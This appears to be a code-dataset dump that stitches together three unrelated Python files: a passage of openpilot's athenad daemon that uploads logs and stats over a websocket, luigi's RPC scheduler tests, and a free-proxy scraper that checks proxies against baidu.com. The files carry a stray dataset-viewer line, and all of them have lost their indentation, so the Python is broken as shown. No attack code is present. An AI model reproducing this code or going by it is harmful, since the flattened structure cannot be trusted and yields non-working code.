from selfdrive.camerad.snapshot.snapshot import jpeg_write, snapshot
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
while not end_event.is_set():
last_scan = 0
curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
rpc_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
try:
from unittest import mock
except ImportError:
import mock
import luigi.rpc
from luigi.scheduler import Scheduler
import scheduler_api_test
import luigi.server
from server_test import ServerTestBase
import time
import socket
from multiprocessing import Process, Queue
import requests
class RemoteSchedulerTest(unittest.TestCase):
def testUrlArgumentVariations(self):
for url in ['http://zorg.com', 'http://zorg.com/']:
for suffix in ['api/123', '/api/123']:
s = luigi.rpc.RemoteScheduler(url, 42)
with mock.patch.object(s, '_fetcher') as fetcher:
s._fetch(suffix, '{}')
fetcher.fetch.assert_called_once_with('http://zorg.com/api/123', '{}', 42)
def get_work(self, fetcher_side_effect):
class ShorterWaitRemoteScheduler(luigi.rpc.RemoteScheduler):
"""
A RemoteScheduler which waits shorter than usual before retrying (to speed up tests).
"""
def _wait(self):
time.sleep(1)
scheduler = ShorterWaitRemoteScheduler('http://zorg.com', 42)
with mock.patch.object(scheduler, '_fetcher') as fetcher:
fetcher.raises = socket.timeout
fetcher.fetch.side_effect = fetcher_side_effect
return scheduler.get_work("fake_worker")
def test_retry_rpc_method(self):
"""
Tests that a call to a RPC method is re-tried 3 times.
"""
fetch_results = [socket.timeout, socket.timeout, '{"response":{}}']
self.assertEqual({}, self.get_work(fetch_results))
def test_retry_rpc_limited(self):
"""
Tests that a call to an RPC method fails after the third attempt
"""
fetch_results = [socket.timeout, socket.timeout, socket.timeout]
self.assertRaises(luigi.rpc.RPCError, self.get_work, fetch_results)
def test_get_work_retries_on_null(self):
"""
Tests that get_work will retry if the response is null
"""
fetch_results = ['{"response": null}', '{"response": {"pass": true}}']
self.assertEqual({'pass': True}, self.get_work(fetch_results))
def test_get_work_retries_on_null_limited(self):
"""
Tests that get_work will give up after the third null response
"""
fetch_results = ['{"response": null}'] * 3 + ['{"response": {}}']
self.assertRaises(luigi.rpc.RPCError, self.get_work, fetch_results)
class RPCTest(scheduler_api_test.SchedulerApiTest, ServerTestBase):
def get_app(self):
conf = self.get_scheduler_config()
sch = Scheduler(**conf)
return luigi.server.app(sch)
def setUp(self):
super(RPCTest, self).setUp()
self.sch = luigi.rpc.RemoteScheduler(self.get_url(''))
self.sch._wait = lambda: None
# disable test that doesn't work with remote scheduler
def test_task_first_failure_time(self):
pass
def test_task_first_failure_time_remains_constant(self):
pass
def test_task_has_excessive_failures(self):
pass
def test_quadratic_behavior(self):
""" This would be too slow to run through network """
pass
def test_get_work_speed(self):
""" This would be too slow to run through network """
pass
class RequestsFetcherTest(ServerTestBase):
def test_fork_changes_session(self):
session = requests.Session()
fetcher = luigi.rpc.RequestsFetcher(session)
q = Queue()
def check_session(q):
fetcher.check_pid()
# make sure that check_pid has changed out the session
q.put(fetcher.session != session)
p = Process(target=check_session, args=(q,))
p.start()
p.join()
self.assertTrue(q.get(), 'the requests.Session should have changed in the new process')
|
getIp.py
|
# *-* coding:utf-8 *-*
import requests
from bs4 import BeautifulSoup
import bs4
import lxml
from multiprocessing import Process, Queue
import random
import json
import time
import requests
class Proxies(object):
"""docstring for Proxies"""
def __init__(self, page=3):
self.proxies = []
self.verify_pro = []
self.page = page
self.headers = {
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8'
}
self.get_proxies()
self.get_proxies_nn()
def get_proxies(self):
page = random.randint(1,10)
page_stop = page + self.page
while page < page_stop:
url = 'http://www.xicidaili.com/nt/%d' % page
html = requests.get(url, headers=self.headers).content
soup = BeautifulSoup(html, 'lxml')
ip_list = soup.find(id='ip_list')
for odd in ip_list.find_all(class_='odd'):
protocol = odd.find_all('td')[5].get_text().lower()+'://'
self.proxies.append(protocol + ':'.join([x.get_text() for x in odd.find_all('td')[1:3]]))
page += 1
def get_proxies_nn(self):
page = random.randint(1,10)
page_stop = page + self.page
while page < page_stop:
url = 'http://www.xicidaili.com/nn/%d' % page
html = requests.get(url, headers=self.headers).content
soup = BeautifulSoup(html, 'lxml')
ip_list = soup.find(id='ip_list')
for odd in ip_list.find_all(class_='odd'):
protocol = odd.find_all('td')[5].get_text().lower() + '://'
self.proxies.append(protocol + ':'.join([x.get_text() for x in odd.find_all('td')[1:3]]))
page += 1
def verify_proxies(self):
# 没验证的代理
old_queue = Queue()
# 验证后的代理
new_queue = Queue()
print ('verify proxy........')
works = []
for _ in range(15):
works.append(Process(target=self.verify_one_proxy, args=(old_queue,new_queue)))
for work in works:
work.start()
for proxy in self.proxies:
old_queue.put(proxy)
for work in works:
old_queue.put(0)
for work in works:
work.join()
self.proxies = []
while 1:
try:
self.proxies.append(new_queue.get(timeout=1))
except:
break
print ('verify_proxies done!')
def verify_one_proxy(self, old_queue, new_queue):
while 1:
proxy = old_queue.get()
if proxy == 0:break
protocol = 'https' if 'https' in proxy else 'http'
proxies = {protocol: proxy}
try:
if requests.get('http://www.baidu.com', proxies=proxies, timeout=2).status_code == 200:
print ('success %s' % proxy)
new_queue.put(proxy)
except:
print ('fail %s' % proxy)
if __name__ == '__main__':
a = Proxies()
a.verify_proxies()
print (a.proxies)
proxie = a.proxies
with open('proxies.txt', 'a') as f:
for proxy in proxie:
f.write(proxy+'\n')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.